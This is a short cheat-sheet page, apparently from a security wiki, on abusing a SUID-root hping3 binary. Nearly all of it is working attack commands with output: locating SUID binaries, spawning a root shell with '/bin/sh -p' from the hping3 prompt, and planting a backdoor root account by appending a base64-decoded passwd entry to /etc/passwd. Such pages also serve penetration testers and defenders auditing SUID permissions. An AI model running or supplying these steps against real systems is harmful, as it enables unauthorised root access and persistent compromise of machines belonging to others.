Hping3
hping3 is a network testing tool used for crafting and sending custom TCP/IP packets. It supports TCP, UDP, ICMP, and RAW-IP protocols, allowing precise control over packet headers. Unlike standard tools like ping, hping3 enables advanced manipulation of traffic for in-depth network analysis and security assessment.
hping3 can be leveraged to gain access to sensitive files or escalate to a root shell :
Escalate to root in a not fully interactive shell (source):
$ find / -type f -perm -u=s 2>/dev/null
/usr/sbin/hping3
$ /usr/sbin/hping3
hping3> /bin/sh -p
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)A new root user can be created to gain a fully interactive shell:
# Create a hash
$ openssl passwd -1 -salt hacker pass123
$1$hacker$zVnrpoW2JQO5YUrLmAs.o1
# Launch a hping3 shell
$ /usr/sbin/hping3
# Base-64 encode the payload
$ echo 'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0::/root:/bin/bash' | base64
aGF...<SNIP>...oCg==
hping3> echo "aGF...<SNIP>...oCg==" | base64 -d >> /etc/passwd
hping3> su hacker
Password: pass123
# id
uid=0(root) gid=0(root) groups=0(root)Last updated
Was this helpful?